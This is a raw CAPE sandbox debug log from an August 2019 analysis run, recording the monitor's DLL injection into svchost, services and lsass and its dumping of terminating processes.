2019-08-13 23:41:24,293 [root] DEBUG: DLL loaded at 0x000007FEEF630000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-08-13 23:41:24,293 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-08-13 23:41:24,371 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-08-13 23:41:24,388 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00270000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-08-13 23:41:24,403 [root] INFO: Announced 64-bit process name: svchost.exe pid: 3868
2019-08-13 23:41:24,403 [root] DEBUG: DLL loaded at 0x000007FEEEF80000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-08-13 23:41:24,403 [root] DEBUG: DLL loaded at 0x000007FEEEF80000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-08-13 23:41:24,403 [root] DEBUG: DLL loaded at 0x000007FEEEE10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-08-13 23:41:24,418 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:24,418 [root] DEBUG: DLL loaded at 0x000007FEEEE10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-08-13 23:41:24,418 [root] DEBUG: DLL loaded at 0x000007FEEEC70000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-08-13 23:41:24,418 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:24,434 [root] DEBUG: DLL loaded at 0x000007FEEEC70000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-08-13 23:41:24,434 [root] DEBUG: DLL loaded at 0x000007FEF9850000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-08-13 23:41:24,434 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:24,434 [root] DEBUG: DLL loaded at 0x000007FEF9850000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-08-13 23:41:24,559 [root] DEBUG: Loader: Injecting process 3868 (thread 3888) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:24,575 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 920
2019-08-13 23:41:24,575 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-08-13 23:41:24,575 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-08-13 23:41:24,575 [root] DEBUG: GetHookCallerBase: thread 2796 (handle 0x0), return address 0x000000013F39C504, allocation base 0x000000013F390000.
2019-08-13 23:41:24,575 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-08-13 23:41:24,589 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:24,589 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000000013F390000.
2019-08-13 23:41:24,605 [root] DEBUG: DLL loaded at 0x000007FEED730000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-08-13 23:41:24,621 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FFA1B000 - 0x000007FEFF430000
2019-08-13 23:41:24,637 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000000013F390000.
2019-08-13 23:41:24,637 [root] DEBUG: DLL loaded at 0x000007FEED730000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-08-13 23:41:24,637 [root] DEBUG: DLL loaded at 0x000000001D100000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-08-13 23:41:24,637 [root] DEBUG: InjectDllViaIAT: Allocated 0x210 bytes for new import table at 0x00000000FFA20000.
2019-08-13 23:41:24,637 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000C63C.
2019-08-13 23:41:24,637 [root] DEBUG: DLL loaded at 0x000000001D010000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-08-13 23:41:24,653 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:24,653 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-08-13 23:41:24,667 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:24,667 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-08-13 23:41:24,667 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-08-13 23:41:24,667 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3868
2019-08-13 23:41:24,667 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-08-13 23:41:24,667 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-08-13 23:41:24,667 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\920_13713390303416214382019
2019-08-13 23:41:24,684 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-08-13 23:41:24,684 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-08-13 23:41:24,684 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x73e00.
2019-08-13 23:41:24,684 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:24,714 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-08-13 23:41:24,714 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-08-13 23:41:24,730 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:24,730 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-08-13 23:41:24,730 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:24,730 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 23:41:24,746 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:24,746 [root] DEBUG: DLL unloaded from 0x000007FEF2570000.
2019-08-13 23:41:24,746 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:24,746 [root] DEBUG: DLL unloaded from 0x000007FEF2F10000.
2019-08-13 23:41:24,746 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-08-13 23:41:24,746 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:24,762 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:24,762 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 3868 at 0x0000000074460000, image base 0x00000000FFA10000, stack from 0x00000000000A5000-0x00000000000B0000
2019-08-13 23:41:24,762 [root] INFO: Notified of termination of process with pid 920.
2019-08-13 23:41:24,762 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe.
2019-08-13 23:41:24,778 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1988
2019-08-13 23:41:24,778 [root] INFO: Added new process to list with pid: 3868
2019-08-13 23:41:24,778 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-08-13 23:41:24,778 [root] DEBUG: GetHookCallerBase: thread 2380 (handle 0x0), return address 0x0000000049D987DD, allocation base 0x0000000049D90000.
2019-08-13 23:41:24,778 [root] INFO: Monitor successfully loaded in process with pid 3868.
2019-08-13 23:41:24,792 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000049D90000.
2019-08-13 23:41:24,792 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2352
2019-08-13 23:41:24,792 [root] DEBUG: set_caller_info: Adding region at 0x0000000010000000 to caller regions list (ntdll::LdrLoadDll).
2019-08-13 23:41:24,792 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00250000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-08-13 23:41:24,792 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000049D90000.
2019-08-13 23:41:24,792 [root] DEBUG: GetHookCallerBase: thread 2216 (handle 0x0), return address 0x01E7659B, allocation base 0x01E60000.
2019-08-13 23:41:24,823 [root] DEBUG: set_caller_info: Adding region at 0x00000000002C0000 to caller regions list (ntdll::LdrLoadDll).
2019-08-13 23:41:24,823 [root] DEBUG: DumpProcess: Module entry point VA is 0x00000000000090B4.
2019-08-13 23:41:24,823 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-08-13 23:41:24,839 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-08-13 23:41:24,839 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-08-13 23:41:24,839 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-08-13 23:41:24,839 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 3640
2019-08-13 23:41:24,855 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-08-13 23:41:24,855 [root] DEBUG: DumpProcess: Module entry point VA is 0x000014E0.
2019-08-13 23:41:24,855 [root] DEBUG: GetHookCallerBase: thread 3644 (handle 0x0), return address 0x000000013F39C504, allocation base 0x000000013F390000.
2019-08-13 23:41:24,855 [root] DEBUG: DLL loaded at 0x000007FEFCA40000: C:\Windows\system32\bcrypt (0x22000 bytes).
2019-08-13 23:41:24,871 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000000013F390000.
2019-08-13 23:41:24,871 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\1988_26897976241214382019
2019-08-13 23:41:24,871 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000000013F390000.
2019-08-13 23:41:24,887 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x54400.
2019-08-13 23:41:24,887 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-08-13 23:41:24,887 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000C63C.
2019-08-13 23:41:24,887 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\2352_895413440241214382019
2019-08-13 23:41:24,887 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:24,887 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-08-13 23:41:24,901 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x82400.
2019-08-13 23:41:24,901 [root] INFO: Notified of termination of process with pid 1988.
2019-08-13 23:41:24,901 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x01E60000.
2019-08-13 23:41:24,901 [root] DEBUG: DLL loaded at 0x000007FEFEDB0000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2019-08-13 23:41:24,917 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\bbTJiLOfj\CAPE\2352_197056140241214382019
2019-08-13 23:41:24,917 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\3640_395406888441214382019
2019-08-13 23:41:24,917 [root] DEBUG: DLL loaded at 0x000007FEFAF10000: C:\Windows\system32\IPHLPAPI (0x27000 bytes).
2019-08-13 23:41:24,934 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x73e00.
2019-08-13 23:41:24,934 [root] DEBUG: DLL loaded at 0x000007FEFAED0000: C:\Windows\system32\WINNSI (0xb000 bytes).
2019-08-13 23:41:24,934 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-08-13 23:41:24,948 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-08-13 23:41:24,948 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\2352_197056140241214382019
2019-08-13 23:41:24,948 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 23:41:24,948 [root] DEBUG: DumpRegion: Dumped stack region from 0x01E60000, size 0x2c000.
2019-08-13 23:41:24,948 [root] DEBUG: DLL unloaded from 0x000007FEF2570000.
2019-08-13 23:41:24,964 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-08-13 23:41:24,964 [root] DEBUG: DLL unloaded from 0x74340000.
2019-08-13 23:41:24,964 [root] DEBUG: DLL unloaded from 0x000007FEF2F10000.
2019-08-13 23:41:24,964 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-08-13 23:41:24,964 [root] DEBUG: DLL unloaded from 0x75140000.
2019-08-13 23:41:24,980 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-08-13 23:41:24,980 [root] DEBUG: DLL loaded at 0x000007FEF4950000: C:\Windows\system32\WINHTTP (0x71000 bytes).
2019-08-13 23:41:24,980 [root] DEBUG: DLL unloaded from 0x749D0000.
2019-08-13 23:41:24,980 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:24,980 [root] DEBUG: DLL loaded at 0x000007FEF4500000: C:\Windows\system32\webio (0x64000 bytes).
2019-08-13 23:41:24,980 [root] INFO: Notified of termination of process with pid 2352.
2019-08-13 23:41:24,996 [root] INFO: Notified of termination of process with pid 3640.
2019-08-13 23:41:25,012 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 3000
2019-08-13 23:41:25,012 [root] DEBUG: GetHookCallerBase: thread 1276 (handle 0x0), return address 0x0000000049D987DD, allocation base 0x0000000049D90000.
2019-08-13 23:41:25,012 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000049D90000.
2019-08-13 23:41:25,026 [root] DEBUG: DLL loaded at 0x000007FEFCA70000: C:\Windows\system32\ncrypt (0x4e000 bytes).
2019-08-13 23:41:25,026 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000049D90000.
2019-08-13 23:41:25,026 [root] DEBUG: DumpProcess: Module entry point VA is 0x00000000000090B4.
2019-08-13 23:41:25,042 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\SHELL32 (0xd88000 bytes).
2019-08-13 23:41:25,042 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-08-13 23:41:25,058 [root] DEBUG: set_caller_info: Adding region at 0x0000000000030000 to caller regions list (ntdll::NtOpenFile).
2019-08-13 23:41:25,073 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 23:41:25,073 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\3000_1223433370251214382019
2019-08-13 23:41:25,073 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\cryptsp (0x17000 bytes).
2019-08-13 23:41:25,089 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x54400.
2019-08-13 23:41:25,089 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\system32\credssp (0xa000 bytes).
2019-08-13 23:41:25,089 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:25,105 [root] INFO: Notified of termination of process with pid 3000.
2019-08-13 23:41:25,105 [root] DEBUG: DLL unloaded from 0x000007FEFC8F0000.
2019-08-13 23:41:25,121 [root] INFO: Process with pid 2352 has terminated
2019-08-13 23:41:25,121 [root] INFO: Process with pid 1356 has terminated
2019-08-13 23:41:25,121 [root] INFO: Process with pid 920 has terminated
2019-08-13 23:41:25,135 [root] INFO: Process with pid 3640 has terminated
2019-08-13 23:41:25,151 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-08-13 23:41:25,167 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00260000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-08-13 23:41:25,198 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-08-13 23:41:25,213 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00270000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-08-13 23:41:25,230 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 3132
2019-08-13 23:41:25,246 [root] DEBUG: GetHookCallerBase: thread 3136 (handle 0x0), return address 0x000000013F39C504, allocation base 0x000000013F390000.
2019-08-13 23:41:25,246 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000000013F390000.
2019-08-13 23:41:25,246 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 3112
2019-08-13 23:41:25,260 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000000013F390000.
2019-08-13 23:41:25,260 [root] DEBUG: GetHookCallerBase: thread 3144 (handle 0x0), return address 0x000000013F39C504, allocation base 0x000000013F390000.
2019-08-13 23:41:25,260 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000C63C.
2019-08-13 23:41:25,276 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000000013F390000.
2019-08-13 23:41:25,276 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000000013F390000.
2019-08-13 23:41:25,292 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000C63C.
2019-08-13 23:41:25,323 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\3132_1630176231451214382019
2019-08-13 23:41:25,338 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x73e00.
2019-08-13 23:41:25,355 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-08-13 23:41:25,355 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\3112_13407981483516214382019
2019-08-13 23:41:25,355 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-08-13 23:41:25,369 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x73e00.
2019-08-13 23:41:25,369 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 23:41:25,369 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-08-13 23:41:25,369 [root] DEBUG: DLL unloaded from 0x000007FEF2570000.
2019-08-13 23:41:25,385 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-08-13 23:41:25,385 [root] DEBUG: DLL unloaded from 0x000007FEF2F10000.
2019-08-13 23:41:25,385 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 23:41:25,385 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-08-13 23:41:25,385 [root] DEBUG: DLL unloaded from 0x000007FEF2570000.
2019-08-13 23:41:25,401 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:25,401 [root] DEBUG: DLL unloaded from 0x000007FEF2F10000.
2019-08-13 23:41:25,401 [root] INFO: Notified of termination of process with pid 3132.
2019-08-13 23:41:25,401 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-08-13 23:41:25,417 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 668
2019-08-13 23:41:25,417 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:25,417 [root] DEBUG: GetHookCallerBase: thread 416 (handle 0x0), return address 0x0000000049D987DD, allocation base 0x0000000049D90000.
2019-08-13 23:41:25,417 [root] INFO: Notified of termination of process with pid 3112.
2019-08-13 23:41:25,433 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\cryptbase (0xf000 bytes).
2019-08-13 23:41:25,433 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000049D90000.
2019-08-13 23:41:25,447 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 3488
2019-08-13 23:41:25,447 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000049D90000.
2019-08-13 23:41:25,447 [root] DEBUG: GetHookCallerBase: thread 3492 (handle 0x0), return address 0x0000000049D987DD, allocation base 0x0000000049D90000.
2019-08-13 23:41:25,447 [root] DEBUG: DumpProcess: Module entry point VA is 0x00000000000090B4.
2019-08-13 23:41:25,463 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000049D90000.
2019-08-13 23:41:25,463 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-08-13 23:41:25,463 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000049D90000.
2019-08-13 23:41:25,480 [root] DEBUG: DumpProcess: Module entry point VA is 0x00000000000090B4.
2019-08-13 23:41:25,480 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-08-13 23:41:25,510 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\668_1861484912251214382019
2019-08-13 23:41:25,510 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x54400.
2019-08-13 23:41:25,526 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:25,526 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\3488_2056401248251214382019
2019-08-13 23:41:25,542 [root] INFO: Notified of termination of process with pid 668.
2019-08-13 23:41:25,542 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x54400.
2019-08-13 23:41:25,542 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:25,558 [root] INFO: Notified of termination of process with pid 3488.
2019-08-13 23:41:25,619 [root] DEBUG: DLL loaded at 0x000007FEFAD70000: C:\Windows\system32\dhcpcsvc (0x18000 bytes).
2019-08-13 23:41:25,635 [root] DEBUG: set_caller_info: Adding region at 0x0000000000130000 to caller regions list (advapi32::CryptAcquireContextW).
2019-08-13 23:41:25,681 [root] DEBUG: DLL unloaded from 0x000007FEFD430000.
2019-08-13 23:41:25,759 [root] INFO: Announced starting service "KeyIso"
2019-08-13 23:41:25,759 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2019-08-13 23:41:25,792 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:25,792 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:25,806 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:25,822 [root] DEBUG: Loader: Injecting process 460 (thread 0) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:25,822 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2256, handle 0x84
2019-08-13 23:41:25,838 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-08-13 23:41:25,838 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-08-13 23:41:25,854 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-08-13 23:41:25,854 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:25,869 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:25,869 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:25,884 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:25,901 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:25,915 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 460 at 0x0000000074460000, image base 0x00000000FFA10000, stack from 0x0000000003226000-0x0000000003230000
2019-08-13 23:41:25,915 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2019-08-13 23:41:25,931 [root] INFO: Added new process to list with pid: 460
2019-08-13 23:41:25,931 [root] INFO: Monitor successfully loaded in process with pid 460.
2019-08-13 23:41:25,947 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-08-13 23:41:25,947 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-08-13 23:41:25,947 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:26,150 [root] INFO: Process with pid 1560 has terminated
2019-08-13 23:41:26,150 [root] INFO: Process with pid 668 has terminated
2019-08-13 23:41:26,150 [root] INFO: Process with pid 3132 has terminated
2019-08-13 23:41:26,165 [root] INFO: Process with pid 3112 has terminated
2019-08-13 23:41:27,180 [root] INFO: Process with pid 1988 has terminated
2019-08-13 23:41:27,196 [root] INFO: Process with pid 3488 has terminated
2019-08-13 23:41:27,242 [root] INFO: Announced 64-bit process name: lsass.exe pid: 2756
2019-08-13 23:41:27,273 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:27,273 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:27,289 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:27,289 [root] DEBUG: Loader: Injecting process 2756 (thread 2944) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:27,305 [root] DEBUG: Process image base: 0x00000000FF1A0000
2019-08-13 23:41:27,305 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:27,305 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF1AC000 - 0x000007FEFF430000
2019-08-13 23:41:27,335 [root] DEBUG: InjectDllViaIAT: Allocated 0x2a4 bytes for new import table at 0x00000000FF1B0000.
2019-08-13 23:41:27,367 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:27,382 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:27,382 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2756
2019-08-13 23:41:27,414 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:27,430 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:27,460 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:27,476 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:27,476 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:27,476 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:27,492 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2756 at 0x0000000074460000, image base 0x00000000FF1A0000, stack from 0x00000000001E4000-0x00000000001F0000
2019-08-13 23:41:27,492 [root] DEBUG: Commandline: C:\Windows\sysnative\lsass.exe.
2019-08-13 23:41:27,507 [root] INFO: Added new process to list with pid: 2756
2019-08-13 23:41:27,523 [root] INFO: Monitor successfully loaded in process with pid 2756.
2019-08-13 23:41:28,256 [root] INFO: Process with pid 3000 has terminated
2019-08-13 23:41:58,098 [root] INFO: Notified of termination of process with pid 2756.
2019-08-13 23:41:58,115 [root] DEBUG: Terminate Event: Attempting to dump process 2756
2019-08-13 23:41:58,115 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 3868
2019-08-13 23:41:58,115 [root] DEBUG: GetHookCallerBase: thread 3888 (handle 0x0), return address 0x0000000010012FCF, allocation base 0x0000000010000000.
2019-08-13 23:41:58,130 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000010000000.
2019-08-13 23:41:58,145 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000010000000.
2019-08-13 23:41:58,161 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000BC50.
2019-08-13 23:41:58,193 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\3868_337956475272214382019
2019-08-13 23:41:58,207 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x1be00.
2019-08-13 23:41:58,207 [root] DEBUG: DLL unloaded from 0x000007FEFC500000.
2019-08-13 23:41:58,223 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:58,223 [root] INFO: Notified of termination of process with pid 3868.
